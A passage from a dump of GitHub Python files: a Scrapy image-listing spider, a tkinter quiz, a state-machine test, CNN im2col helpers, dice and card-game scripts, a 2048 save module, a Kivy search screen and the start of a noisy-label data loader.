start_urls = ['http://vilipix.com/']\n\n def start_requests(self):\n # 为确保可以加载图片,选取昨天的网址\n yesterday = (date.today() + timedelta(days = -1)).strftime(\"%Y%m%d\")\n base_params = {'mode':'daily','date':yesterday,'limit':IMAGES,'offset':0}\n base_url = 'https://www.vilipix.com/api/illust?'\n params = urlencode(base_params)\n url = base_url+params\n yield Request(url,self.parse)\n\n def parse(self, response):\n result = json.loads(response.text)\n for image in result.get('rows'):\n item = VilipixItem()\n item['id'] = image.get('id')\n item['url'] = image.get('regular_url')\n item['title'] = image.get('title')\n print(\"id:{}\\t url:{}\\t title:{}\".format(item['id'],item['url'],item['title']))\n yield item\n","repo_name":"Ther-nullptr/vilipix","sub_path":"spiders/pixiv.py","file_name":"pixiv.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"3635876082","text":"from tkinter import *\nfrom quiz_brain import QuizBrain\n\nTHEME_COLOR = \"#375362\"\n\n\nclass QuizInterface:\n def __init__(self, quiz_brain: QuizBrain):\n self.quiz = quiz_brain\n self.window = Tk()\n self.window.title(\"tjh's Quiz\")\n self.window.config(bg=THEME_COLOR, pady=20, padx=20)\n\n self.canvas = Canvas(width=300, height=250, bg=\"white\", highlightthickness=0)\n self.question_text = self.canvas.create_text(150, 125, text=\"\", fill=THEME_COLOR, width=280,\n font=(\"Arial\", 20, \"italic\"))\n self.canvas.grid(row=1, column=0, columnspan=2, pady=40)\n\n self.score_counter = Label()\n self.score_counter.config(text=\"Score: 0\", bg=THEME_COLOR, fg=\"white\", font=(\"Arial\", 16))\n self.score_counter.grid(row=0, column=1)\n\n tick_img = PhotoImage(file=\"./images/true.png\")\n self.tick_button = Button(image=tick_img, highlightthickness=0, command=self.check_answer_true)\n self.tick_button.grid(row=2, column=0)\n\n cross_img = PhotoImage(file=\"./images/false.png\")\n self.cross_button = Button(image=cross_img, highlightthickness=0, command=self.check_answer_false)\n self.cross_button.grid(row=2, column=1)\n\n self.get_next_question()\n\n self.window.mainloop()\n\n\n def get_next_question(self):\n self.canvas.config(bg=\"white\")\n self.score_counter.config(text=f\"Score: {self.quiz.score}\")\n if self.quiz.still_has_questions():\n q_text = self.quiz.next_question()\n self.canvas.itemconfig(self.question_text, text=q_text)\n else:\n self.canvas.itemconfig(self.question_text, text=f\"Quiz Complete \\n Final score: {self.quiz.score}/10\")\n self.tick_button.config(state=\"disabled\")\n self.cross_button.config(state=\"disabled\")\n\n def check_answer_true(self):\n result = self.quiz.check_answer(\"True\")\n self.give_feedback(result)\n\n def check_answer_false(self):\n result = self.quiz.check_answer(\"False\")\n self.give_feedback(result)\n\n def give_feedback(self, result):\n if result:\n self.canvas.config(bg=\"green\")\n else:\n self.canvas.config(bg=\"red\")\n self.window.after(1000, self.get_next_question)\n\n\n","repo_name":"TylerHardwick/100-days-of-Python","sub_path":"Day-34-GUI-API-Quiz/ui.py","file_name":"ui.py","file_ext":"py","file_size_in_byte":2307,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"515330900","text":"import pytest\n\nfrom components.fsm.states import VesselState, BerthState\nfrom components.fsm import VesselStateMachine, BerthStateMachine\n\nfrom .constants import SECONDS_IN_DAY\nfrom .fixtures import world_and_timer_processor_fixture\n\n\n@pytest.fixture()\ndef vessel_fsm():\n return VesselStateMachine()\n\n\n@pytest.fixture()\ndef berth_fsm():\n return BerthStateMachine(lambda _: 100)\n\n\ndef test_flow(vessel_fsm, berth_fsm, world_and_timer_processor_fixture):\n # Unpack the world and timer processor\n world, timer_processor = world_and_timer_processor_fixture\n\n # A vessel appears as a scheduled vessel\n assert vessel_fsm.current() == VesselState.SCHEDULED\n vessel_fsm.generate()\n\n assert vessel_fsm.current() == VesselState.INCOMING\n\n vessel_fsm.assign_berth(berth_fsm, 1)\n\n # A vessel is then routed to a berth, this should result in the berth\n # being booked and in the vessel heading to the berth\n vessel_fsm.go_to_berth()\n\n assert vessel_fsm.current() == VesselState.GOING_TO_BERTH\n assert berth_fsm.current() == BerthState.WAITING_FOR_VESSEL\n\n # The vessel arrives at the berth and it is processed\n vessel_fsm.servicing(None)\n\n assert vessel_fsm.current() == VesselState.SERVICING\n assert berth_fsm.current() == BerthState.SERVING_VESSEL\n\n # Wait to make sure the timer fired\n timer_processor._process(SECONDS_IN_DAY)\n\n # The vessel should have finished processing and the berth\n # should be free\n print(vessel_fsm.current())\n assert vessel_fsm.current() == VesselState.WAITING_FOR_DEPARTURE_CLEARANCE\n assert berth_fsm.current() == BerthState.AVAILABLE\n\n # Make the vessel leave and complete the visit\n vessel_fsm.leave()\n assert vessel_fsm.current() == VesselState.LEAVING\n\n vessel_fsm.complete()\n assert vessel_fsm.current() == VesselState.LEFT\n","repo_name":"pyseidon-sim/pyseidon","sub_path":"tests/test_ship_state_machine.py","file_name":"test_ship_state_machine.py","file_ext":"py","file_size_in_byte":1837,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"85"} +{"seq_id":"20953950892","text":"#!/usr/bin/env python \n# encoding: utf-8 \n\n\"\"\" \n@author: @樊厚翔\n@contact: houxiang_fan@163.com \n@file: utils.py \n@time: 2019/7/4 19:48 \n\"\"\"\n\nimport numpy as np\n\ndef im2col(input_data,f_height,f_width,stride = 1,padding = 0):\n \"\"\"优化卷积算法 将原来矩阵展开\"\"\"\n out_channel,in_channel,height,width = input_data.shape\n\n out_height = 1 + (height + 2 * padding - f_height) // stride\n out_width = 1 + (width + 2 * padding - f_width) // stride\n\n img = np.pad(input_data,[(0,0),(0,0),(padding,padding),(padding,padding)],'constant')\n col = np.zeros((out_channel,in_channel,f_height,f_width,out_height,out_width))\n\n for y in range(f_height):\n y_max = y + stride * out_height\n for x in range(f_width):\n x_max = x + stride * out_width\n col[:, :, y, x, :, :] = img[:, :, y:y_max:stride, x:x_max:stride]\n\n # 坐标轴的变换\n col = col.transpose(0, 4, 5, 1, 2, 3).reshape(out_channel * out_height * out_width, -1)\n\n return col\n\ndef col2im(col,input_shape,f_height,f_width,stride = 1,padding = 0):\n \"\"\"将展开的矩阵还原\"\"\"\n\n N,C,height,width = input_shape\n\n out_height = (height + 2 * padding - f_height) // stride + 1\n out_width = (width + 2 * padding - f_width) // stride + 1\n col = col.reshape(N, out_height, out_width, C, f_height, f_width).transpose(0, 3, 4, 5, 1, 2)\n\n img = np.zeros((N, C, height + 2*padding + stride - 1, width + 2*padding + stride - 1))\n for y in range(f_height):\n y_max = y + stride*out_height\n for x in range(f_width):\n x_max = x + stride*out_width\n img[:, :, y:y_max:stride, x:x_max:stride] += col[:, :, y, x, :, :]\n\n return img[:, :, padding:height + padding, padding:width + padding]\n\ndef translate(y):\n train_y = np.zeros([y.shape[0], 10])\n for i in range(y.shape[0]):\n for j in range(10):\n if y[i] == j:\n train_y[i][j] = 1\n return train_y\n","repo_name":"masamibf/numpy-for-CNN","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"85"} +{"seq_id":"42262882739","text":"\"\"\"\nRohan Dalal\n27 January 2021\nIDT\n1st Period\nSMF_8\n\"\"\"\nimport cs50\nimport os,sys\nimport random\n\ndef main():\n print('This is a custom dice roller, coinflipper, it can even give you a random card')\n Choice= input('Would you like to flip a coin, roll dice, or get a random card?')\n if(Choice==' Flip a coin'):\n sides =['heads', 'tails']\n x=random.randint(0,1)\n print('You got ' +sides[x])\n elif(Choice==' roll dice'):\n y= input('Would you Like to roll one or two dice')\n z= int(input('How many sides would you like your dice to have'))\n if(y==' one'):\n x=random.randint(1,z)\n print('You rolled a '+str(x))\n elif(y==' two'):\n a=random.randint(1,z)\n b=random.randint(1,z)\n print('You rolled a '+str(a)+' and a '+str(b))\n elif(Choice==' Get a random card'):\n cards=['Ace', '2', '3', '4', '5','6', '7', '8', '9', '10','Jack', 'Queen', 'King']\n suits=[\"Spades\", \"Diamonds\", \"Clubs\", \"Hearts\"]\n a=cards[random.randint(0,12)]\n b=suits[random.randint(0,3)]\n print('You drew a(n) '+a+' of '+b)\nif(__name__=='__main__'):\n main()\n\n\n","repo_name":"RohanKD/IDT-SMF-2021","sub_path":"SMF_8.py","file_name":"SMF_8.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"18446104244","text":"# Fonctionnalité de sauvegarde de la grille en cours\n\nimport os\nfrom grid_2048 import init_grid\nos.getcwd()\n\nif __name__ == \"__main__\":\n os .mkdir(\"Saves\")\nos.chdir(\"Saves\")\n\ndef file_exists(n): # Vérifie si le fichier de sauvegarde numéro n existe\n try:\n f = open(\"save\" + str(n) + \".txt\", 'r')\n return True\n except:\n return False\n\ndef premier_fichier_non_existant():\n i = 1\n while file_exists(i):\n i += 1\n return i\n# Cette dernière fonction permet au système de sauvegarde de savoir sur quel fichier sauvegarder la partie en cours\n# i.e. si les fichiers 1, 2, 3, ..., 10 sont déjà pris, cela sera sauvegardé sur le 11è\n\n\ndef sauvegarde(grid, theme, nombre): # Sauvegarde la grille grid dans fichier de sauvegarde n° nombre \n try:\n f = open('save' + str(nombre) + '.txt', 'x')\n n = len(grid)\n f.write(theme + '\\n') # On stocke le thème pour un futur affichage\n for i in range(n):\n for j in range(n):\n f.write(str(grid[i][j]) + \",\")\n f.write(\"\\n\")\n f.close()\n except:\n print(\"Une sauvegarde existe déjà à la place du fichier \" + str(nombre))\n\n\ndef ecraser_sauvegarde(string):\n os.remove(string)\n\n\ndef recuperation(string):\n f = open(string, 'r')\n file = f.read().split(\"\\n\")\n f.close()\n n = len(file) - 2 # Taille de la grille, qui est carrée (-2 car la première ligne contient le thème, et la dernière contient '')\n grid = [[0 for i in range(n)] for i in range(n)]\n for i in range(1, n+1):\n valeurs = file[i].split(',')\n valeurs.pop(-1) # Le dernier élément de valeurs est '', on n'en veut pas\n for j in range(n):\n grid[i-1][j] = int(valeurs[j])\n return grid, file[0]\n","repo_name":"MandragoreVR/2048","sub_path":"save.py","file_name":"save.py","file_ext":"py","file_size_in_byte":1777,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"33698307406","text":"from typing import Deque, List\n\n\ndef parse_decks(text: str) -> [List[int], List[int]]:\n return [list(int(x) for x in xs.splitlines()[1:]) for xs in text.split(\"\\n\\n\")]\n\n\ndef play_round_1(p1: List[int], p2: List[int]) -> (int, Deque[int]):\n while p1 and p2:\n h1, h2 = p1[0], p2[0]\n p1, p2 = p1[1:], p2[1:]\n if h1 > h2:\n p1 += [h1, h2]\n else:\n p2 += [h2, h1]\n return (0, p1) if p1 else (1, p2)\n\n\ndef play_round_2(p1: List[int], p2: List[int]) -> (int, Deque[int]):\n used = set()\n while p1 and p2:\n key = str(p1) + \"|\" + str(p2)\n if key in used:\n return 1, p2\n used.add(key)\n\n h1, h2 = p1[0], p2[0]\n p1, p2 = p1[1:], p2[1:]\n\n if len(p1) < h1 or len(p2) < h2:\n if h1 > h2:\n p1 += [h1, h2]\n else:\n p2 += [h2, h1]\n else:\n winner, _ = play_round_2(p1[:h1], p2[:h2])\n if winner == 1:\n p1 += [h1, h2]\n else:\n p2 += [h2, h1]\n return (1, p1) if len(p1) > 0 else (2, p2)\n\n\ndef calc_score(deck: List[int]) -> int:\n return sum((i + 1) * v for i, v in enumerate(reversed(deck)))\n\n\ndef solve_part_1(text: str):\n (p1, p2) = parse_decks(text)\n _, winner_deck = play_round_1(p1, p2)\n return calc_score(winner_deck)\n\n\ndef solve_part_2(text: str):\n (p1, p2) = parse_decks(text)\n _, winner_deck = play_round_2(p1, p2)\n return calc_score(winner_deck)\n\n\nif __name__ == '__main__':\n with open(\"input.txt\", \"r\") as f:\n quiz_input = f.read()\n print(\"Part 1:\", solve_part_1(quiz_input))\n print(\"Part 2:\", solve_part_2(quiz_input))\n","repo_name":"MartinSeeler/Advent-of-Code","sub_path":"2020/day22/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"85"} +{"seq_id":"70828562197","text":"#import kivy\nfrom multiprocessing import connection\nfrom kivy.app import App\nfrom functools import partial\nfrom kivy.uix.widget import Widget\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.floatlayout import FloatLayout\nfrom kivy.uix.button import Button\nfrom kivy.uix.button import ButtonBehavior\nfrom kivy.uix.label import Label\nfrom kivy.uix.image import Image\nfrom kivy.uix.gridlayout import GridLayout\nfrom kivy.uix.textinput import TextInput\nfrom kivy.uix.image import AsyncImage\nfrom kivy.uix.scrollview import ScrollView\nfrom kivy.core.window import Window\nfrom kivy.base import runTouchApp\nfrom kivy.properties import StringProperty\nfrom kivy.lang import Builder\nfrom kivy.uix.screenmanager import ScreenManager, Screen\nimport time\nfrom kivy.clock import Clock\nfrom kivy.uix.screenmanager import FallOutTransition\nfrom kivy.uix.screenmanager import SlideTransition\nimport kivy.utils\nimport home_screen, access_my_info\nfrom datetime import datetime\n#import pyperclip\n\nimport functions\n\nif not __name__ == \"home_screen\":\n import home_screen\n\n\nclass SearchScreen (Screen):\n def __init__(self, conn, **kwargs):\n super(SearchScreen, self).__init__(**kwargs)\n print(2)\n\n self.connection = conn\n\n self.main_all_box = BoxLayout(orientation = \"vertical\")\n self.add_widget(self.main_all_box)\n\n self.header_box = BoxLayout (size_hint = (1, 0.1))\n self.main_all_box.add_widget(self.header_box)\n\n self.logo = Button (border = (0, 0, 0, 0), size_hint = (None, None), size = ((Window.size[1] - Window.size[0] / 5) * 0.1, (Window.size[1] - Window.size[0] / 5) * 0.1), background_normal = 'images/logo.png', background_down = 'images/logo.png', on_release = self.refresh_search_screen)\n self.header_box.add_widget(self.logo)\n \n self.header_text = Label(text = \"Small brother\", size_hint = (2, 1))\n self.header_box.add_widget(self.header_text)\n \n self.header_btn = Button(border = (0, 0, 0, 0), size_hint = (None, None), size = ((Window.size[1] - Window.size[0] / 5) * 0.1, (Window.size[1] - Window.size[0] / 5) * 0.1), background_normal = 'images/settings1.png', background_down = 'images/settings2.png')\n self.header_box.add_widget(self.header_btn)\n self.header_btn.bind(on_release = self.header_btn_press)\n \n\n self.content_box = BoxLayout (size_hint = (1, 0.9), orientation = \"vertical\")\n self.main_all_box.add_widget(self.content_box)\n \n self.content_box_scroll = ScrollView ()\n self.content_box.add_widget (self.content_box_scroll) \n\n self.content_grid = GridLayout(cols = 1, size_hint_y = None)\n self.content_box_scroll.add_widget (self.content_grid)\n self.content_grid.bind(minimum_height=self.content_grid.setter('height'))\n\n #self.content_grid.add_widget(Button(text = \"a\", size_hint_y = None, height = 100))\n \n self.display_header_box = BoxLayout(size_hint_y = None, height = Window.size[1] / 8)\n self.content_grid.add_widget(self.display_header_box)\n\n self.content_in_scroll_box = BoxLayout(orientation = 'vertical', size_hint_y = None)\n self.content_grid.add_widget(self.content_in_scroll_box)\n\n self.all_flags = [['images/check_verd.png'], ['images/red_cross.png'], ['images/age18.png'], ['images/blood.png'], ['images/fist.png'], ['images/soga.png'], ['images/art.png'], ['images/discuss.png'], ['images/politic.png'], ['images/sport.png'], ['images/videogame.png'], ['images/music.png']]\n for d in range(len(self.all_flags) - 2):\n self.all_flags[d + 2].append(str(d + 2))\n for x in range (len(self.all_flags) - 2):\n self.all_flags[x + 2].append(0)\n \n #firstposts\n #current: 1 = new, 2 = search\n self.current_posts = 0 \n\n #self.new_posts_header_press(0)\n\n\n self.ground_box = BoxLayout (size_hint_y = None, height = Window.size[0] / 5)\n self.main_all_box.add_widget(self.ground_box)\n\n self.chat_btn = Button (text = (\"C\"))\n self.ground_box.add_widget(self.chat_btn)\n self.chat_btn.bind(on_release = self.press_chat_btn)\n\n self.search_label = Label (text = (\"Search\"))\n self.ground_box.add_widget(self.search_label)\n\n self.home_btn = Button (text = (\"H\"))\n self.ground_box.add_widget(self.home_btn)\n self.home_btn.bind(on_release = self.press_home_btn)\n\n self.make_posts_btn = Button (text = (\"P\"))\n self.ground_box.add_widget(self.make_posts_btn)\n self.make_posts_btn.bind(on_release = self.press_make_posts_btn)\n\n self.user_profile_btn = Button (text = (\"U\"))\n self.ground_box.add_widget(self.user_profile_btn)\n self.user_profile_btn.bind(on_release = self.press_user_profile_btn)\n\n print(20)\n \n\n def header_btn_press(self, instance):\n pass\n\n def flag_press(self, instance):\n flag_number = int(instance.text)\n self.all_flags[flag_number][2] = (self.all_flags[flag_number][2] + 1) % 2 \n if self.all_flags[flag_number][2] == 1:\n instance.background_normal = self.all_flags[1][0]\n elif self.all_flags[flag_number][2] == 0:\n instance.background_normal = self.all_flags[flag_number][0]\n\n def search_header_press(self, instance):\n if self.current_posts == 1:\n self.content_in_scroll_box.clear_widgets()\n\n self.display_header_box.clear_widgets()\n\n for x in range (len(self.all_flags) - 2):\n self.all_flags[x + 2][2] = 0\n\n\n self.new_posts_header_display_btn = Button(text = \"New\")\n self.display_header_box.add_widget(self.new_posts_header_display_btn)\n self.new_posts_header_display_btn.bind(on_release = self.new_posts_header_press)\n\n self.search_header_display_label = Label (text = \"Search\")\n self.display_header_box.add_widget(self.search_header_display_label)\n\n self.search_user_header_btn = Button(size_hint_y = None, height = Window.size[1] / 15 / 2, text = \"Search user:\")\n self.content_in_scroll_box.add_widget(self.search_user_header_btn)\n\n self.search_user_input = TextInput(multiline = False, size_hint_y = None, height = Window.size[1] / 15)\n self.content_in_scroll_box.add_widget(self.search_user_input)\n #self.search_user_input.bind(on_text_validate = self.search_user_def)\n\n self.search_hastags_header_btn = Button(text = \"Search hashtag:\", size_hint_y = None, height = Window.size[1] / 15 / 2)\n self.content_in_scroll_box.add_widget(self.search_hastags_header_btn)\n\n self.search_post_hastags_input = TextInput(multiline = False, size_hint_y = None, height = Window.size[1] / 15)\n self.content_in_scroll_box.add_widget(self.search_post_hastags_input)\n #self.search_post_hastags.bind(on_text_validate = self.search_hastags_def)\n \n self.flag_filter_scroll = ScrollView (size_hint_y = None, height = (Window.size[1] - Window.size[0] / 5) * 0.9 / 12)\n self.content_in_scroll_box.add_widget(self.flag_filter_scroll) \n\n self.flag_grid = GridLayout(rows = 1, size_hint_x = None, size_hint_y = None, height = (Window.size[1] - Window.size[0] / 5) * 0.9 / 12)\n self.flag_grid.bind(minimum_width = self.flag_grid.setter('width'))\n self.flag_filter_scroll.add_widget(self.flag_grid)\n \n for x in range (len(self.all_flags) - 2):\n self.flag_btn = Button(border = (0, 0, 0, 0), font_size = 1, size_hint_x = None, width = (Window.size[1] - Window.size[0] / 5) * 0.9 / 12, text = str(self.all_flags[x + 2][1]), on_release = self.flag_press, background_normal = self.all_flags[x + 2][0])\n self.all_flags[x + 2].append(self.flag_btn)\n self.flag_grid.add_widget(self.flag_btn)\n self.flag_grid.bind(minimum_width = self.flag_grid.setter('width'))\n\n self.search_btn_box = BoxLayout(size_hint_y = None, height = Window.size[1] / 6)\n self.content_in_scroll_box.add_widget(self.search_btn_box)\n\n self.search_btn = Button(on_release = self.search_def, border = (0, 0, 0, 0), text = \"Search\")\n self.search_btn_box.add_widget(self.search_btn)\n\n self.clear_search_btn = Button(size_hint_y = None, height = Window.size[1] / 8, on_release = self.clear_search_def, border = (0, 0, 0, 0), text = \"Clear\")\n self.content_in_scroll_box.add_widget(self.clear_search_btn)\n\n self.searched_box = BoxLayout(size_hint_y = None, height = 0, orientation = \"vertical\")\n self.content_in_scroll_box.add_widget(self.searched_box)\n\n\n self.content_in_scroll_box.height = Window.size[1] / 8 + Window.size[1] / 6 + (Window.size[1] - Window.size[0] / 5) * 0.9 / 12 + Window.size[1] * 3 / 15\n self.content_grid.bind(minimum_height=self.content_grid.setter('height'))\n self.current_posts = 2\n \n def new_posts_header_press(self, instance):\n if self.current_posts == 2:\n self.content_in_scroll_box.clear_widgets()\n\n self.display_header_box.clear_widgets()\n\n\n self.new_posts_header_display_label = Label(text = \"New\")\n self.display_header_box.add_widget(self.new_posts_header_display_label)\n \n self.search_header_display_btn = Button (text = \"Search\")\n self.display_header_box.add_widget(self.search_header_display_btn)\n self.search_header_display_btn.bind(on_release = self.search_header_press)\n\n\n self.content_in_scroll_box.height = len(self.all_newest_posts_info) * Window.size[0] / 1.61\n\n #new posts\n self.create_newest_posts()\n \n self.content_grid.bind(minimum_height=self.content_grid.setter('height'))\n self.current_posts = 1\n\n def new_posts_refresh(self, instance):\n connection = self.connection\n self.all_new_posts_info = connection.get_posts(sort_by = \"time_posted\", sort_order = \"desc\", num = 10)\n self.all_newest_posts_info = functions.order_posts_by_timestamp(self.all_new_posts_info)\n print(self.all_newest_posts_info)\n\n self.create_newest_posts()\n #create a list with users searched. in next def we get info from list\n\n def create_newest_posts(self):\n self.all_displayed_posts_list = []\n conn = self.connection\n my_liked_posts_id = access_my_info.get_liked_id()\n for t in range(len(self.all_newest_posts_info)):\n user_post_info = conn.get_user(self.all_newest_posts_info[t][\"user_id\"])\n actual_maybe_like = 0\n try:\n for liked in my_liked_posts_id:\n if liked == self.all_newest_posts_info[t][\"id\"]:\n actual_maybe_like = 1\n except KeyError:\n pass\n self.post_btn = functions.make_post_btn(self, self.all_newest_posts_info[t][\"user_id\"], user_post_info[\"profile_picture\"], self.all_newest_posts_info[t][\"flags\"], self.all_newest_posts_info[t][\"content\"], self.all_newest_posts_info[t][\"time_posted\"], self.all_newest_posts_info[t][\"id\"], actual_maybe_like, t)\n self.content_in_scroll_box.add_widget(self.post_btn)\n self.all_displayed_posts_list.append([self.all_newest_posts_info[t][\"id\"], self.post_btn, actual_maybe_like])\n self.content_grid.bind(minimum_height=self.content_grid.setter('height'))\n\n def refresh_search_screen(self, instance):\n if self.current_posts == 0 or self.current_posts == 2:\n self.new_posts_refresh(0)\n \n elif self.current_posts == 1:\n self.search_header_press(0)\n self.new_posts_refresh(0)\n\n def get_filter_flags(self):\n self.flag_list = \"\"\n for y in range (len(self.all_flags) - 2):\n self.flag_list = self.flag_list + str(self.all_flags[y + 2][2])\n return self.flag_list\n\n def name_press(self, order_number,instance):\n #self.go_to_user_profile(order_number)\n other_user_profile_screen = self.other_profile_screen\n other_user_profile_screen.refresh_profile_screen(instance.text)\n self.manager.transition = SlideTransition()\n self.manager.current = \"other_profile\"\n self.manager.transition.direction = \"right\"\n\n def image_press(self, order_number, instance):\n if order_number == -1:\n other_user_profile_screen = self.other_profile_screen\n other_user_profile_screen.refresh_profile_screen(self.actual_user)\n self.manager.transition = SlideTransition()\n self.manager.current = \"profile\"\n self.manager.transition.direction = \"other_profile\"\n elif order_number >= 0:\n self.go_to_user_profile(order_number)\n \n def go_to_user_profile(self, order_number):\n con = self.connection\n other_user_profile_screen = self.other_profile_screen\n post_id = self.all_displayed_posts_list[order_number][0]\n post = con.get_post(post_id)\n user = post[\"user_id\"]\n other_user_profile_screen.refresh_profile_screen(user)\n self.manager.transition = SlideTransition()\n self.manager.current = \"other_profile\"\n self.manager.transition.direction = \"right\"\n\n def content_post_press(self, order_number, instance):\n #pyperclip.copy(instance.text)\n pass\n \n def clear_search_def(self, instance):\n self.search_btn_box.clear_widgets()\n self.search_btn = Button(text = \"Search\", on_release = self.search_def, border = (0, 0, 0, 0))\n self.search_btn_box.add_widget(self.search_btn)\n\n self.search_user_input.text = \"\"\n self.search_post_hastags_input.text = \"\"\n\n for x in range (len(self.all_flags) - 2):\n self.all_flags[x + 2][2] = 0\n \n self.flag_grid.clear_widgets()\n for x in range (len(self.all_flags) - 2):\n self.flag_btn = Button(border = (0, 0, 0, 0), font_size = 1, size_hint_x = None, width = (Window.size[1] - Window.size[0] / 5) * 0.9 / 12, text = str(self.all_flags[x + 2][1]), on_release = self.flag_press, background_normal = self.all_flags[x + 2][0])\n self.all_flags[x + 2].append(self.flag_btn)\n self.flag_grid.add_widget(self.flag_btn)\n self.flag_grid.bind(minimum_width = self.flag_grid.setter('width'))\n\n self.searched_box.clear_widgets()\n\n self.content_in_scroll_box.height = Window.size[1] / 8 + Window.size[1] / 6 + (Window.size[1] - Window.size[0] / 5) * 0.9 / 12 + Window.size[1] * 3 / 15\n self.content_grid.bind(minimum_height=self.content_grid.setter('height'))\n\n def search_def(self, instance):\n conn = self.connection\n\n self.search_btn_box.clear_widgets()\n self.search_label_no_press = Label(text = \"Search\")\n self.search_btn_box.add_widget(self.search_label_no_press)\n #self.searched_box.clear_widgets()\n if self.search_post_hastags_input.text != \"\" or self.get_filter_flags() != \"0000000000\":\n print(1)\n searched_posts = conn.get_posts(hashtag = functions.filter_chars(self.search_post_hastags_input.text), exclude_flags = self.get_filter_flags(), num = 10)\n if searched_posts != ():\n self.all_displayed_posts_list = []\n my_liked_posts_id = access_my_info.get_liked_id()\n for t in range(len(searched_posts)):\n user_post_info = conn.get_user(searched_posts[t][\"user_id\"])\n actual_maybe_like = 0\n try:\n for liked in my_liked_posts_id:\n if liked == searched_posts[t][\"id\"]:\n actual_maybe_like = 1\n except KeyError:\n pass\n self.post_btn = functions.make_post_btn(self, searched_posts[t][\"user_id\"], user_post_info[\"profile_picture\"], searched_posts[t][\"flags\"], searched_posts[t][\"content\"], searched_posts[t][\"time_posted\"], searched_posts[t][\"id\"], actual_maybe_like, t)\n self.searched_box.add_widget(self.post_btn)\n self.all_displayed_posts_list.append([searched_posts[t][\"id\"], self.post_btn, actual_maybe_like])\n self.searched_box.height = Window.size[0]/1.61 * len(searched_posts)\n self.content_in_scroll_box.height = self.content_in_scroll_box.height + self.searched_box.height\n elif searched_posts == ():\n self.not_found_label = Label(text = \"Nothing found\", size_hint_y = None, height = Window.size[1]/8)\n self.searched_box.add_widget(self.not_found_label)\n self.searched_box.height = Window.size[1]/8\n self.content_in_scroll_box.height = self.content_in_scroll_box.height + self.searched_box.height\n elif self.search_post_hastags_input.text == \"\" and self.get_filter_flags() == \"0000000000\" and self.search_user_input.text != \"\":\n print(2)\n searched_user = conn.get_user(functions.filter_chars(self.search_user_input.text))\n print(searched_user)\n if searched_user == {}:\n self.not_found_label = Label(text = \"Nothing found\", size_hint_y = None, height = Window.size[1]/8)\n self.searched_box.add_widget(self.not_found_label)\n self.searched_box.height = Window.size[1]/8\n self.content_in_scroll_box.height = self.content_in_scroll_box.height + self.searched_box.height\n elif searched_user != {}:\n self.searched_user_box = BoxLayout(orientation = 'horizontal', size_hint_y = None, height = Window.size[1]/6)\n self.searched_box.add_widget(self.searched_user_box)\n\n self.searched_user_image_grid = functions.build_image(self, searched_user[\"profile_picture\"], -1, Window.size[1]/6)\n self.searched_user_box.add_widget(self.searched_user_image_grid)\n\n self.searched_user_name_btn = Button(text = searched_user[\"user_name\"], on_release = partial(self.name_press, 0))\n self.searched_user_box.add_widget(self.searched_user_name_btn)\n\n self.searched_box.height = Window.size[1]/6\n self.content_in_scroll_box.height = self.content_in_scroll_box.height + self.searched_box.height\n\n self.actual_user = searched_user[\"user_name\"]\n\n self.content_grid.bind(minimum_height=self.content_grid.setter('height'))\n\n def like_press(self, order_number, instance):\n num = self.all_displayed_posts_list[order_number][2]\n num = (num + 1) % 2\n if num == 1:\n instance.background_normal = 'images/heart2.png'\n access_my_info.add_or_remove_liked_post(self.all_displayed_posts_list[order_number][0], 1)\n if num == 0:\n instance.background_normal = 'images/heart.png'\n access_my_info.add_or_remove_liked_post(self.all_displayed_posts_list[order_number][0], 0)\n self.all_displayed_posts_list[order_number][2] = num\n\n def press_chat_btn(self, instance):\n self.manager.transition = SlideTransition()\n self.manager.current = \"chat\"\n self.manager.transition.direction = \"right\"\n \n #def press_search_btn(self, instance):\n # pass\n\n def press_home_btn(self, instance):\n #home_screen = self.home_screen\n #home_screen.get_my_posts(home_screen)\n self.manager.transition = SlideTransition()\n self.manager.current = \"main\"\n self.manager.transition.direction = \"left\"\n\n def press_make_posts_btn(self, instance):\n self.manager.transition = SlideTransition()\n self.manager.current = \"create\"\n self.manager.transition.direction = \"left\"\n\n def press_user_profile_btn(self, instance):\n #profile_screen = self.profile_screen\n #profile_screen.refresh_profile_screen(profile_screen)\n self.manager.transition = SlideTransition()\n self.manager.current = \"profile\"\n self.manager.transition.direction = \"left\"\n \n def add_screens(self, home_screen, profile_screen, other_profile_screen):\n self.home_screen = home_screen\n self.profile_screen = profile_screen\n self.other_profile_screen = other_profile_screen\n","repo_name":"Feluk6174/TdR","sub_path":"gui_1/new_gui/search_screen.py","file_name":"search_screen.py","file_ext":"py","file_size_in_byte":20220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"13907867117","text":"import torch\nimport numpy as np\nimport random\nfrom scipy.io import loadmat\nfrom sklearn import preprocessing\nfrom torch.utils.data import TensorDataset, DataLoader\n\ndef feature_normalize(data):\n '''\n Normalize features by MinMaxScaler.\n :param data: unnormalized features \n :return data: normalized features\n '''\n scaler = preprocessing.MinMaxScaler(feature_range=(-1.0, 1.0)).fit(data)\n data = scaler.transform(data)\n\n return data\n\ndef generate_noisy_labels(labels):\n\n N, C = labels.shape\n\n alpha = []\n for i in range(C):\n alpha.append(round(random.uniform(0.5, 0.9), 1))\n\n alpha = np.array(alpha)\n alpha_mat = np.tile(alpha, (N, 1))\n rand_mat = np.random.rand(N, C)\n \n\n mask = np.zeros((N, C), dtype=np.float)\n mask[labels!=1] = rand_mat[labels!=1] < alpha_mat[labels!=1]\n noisy_labels = labels.clone()\n noisy_labels[mask==1] = -noisy_labels[mask==1]\n\n return noisy_labels.numpy(), labels.numpy()\n\n# def get_loader(dataname, batch_size, meta_size=50, prec=0.8):\ndef get_loader(dataname,batch_size,cv_num,p_noise,p_true,meta_size=50):\n 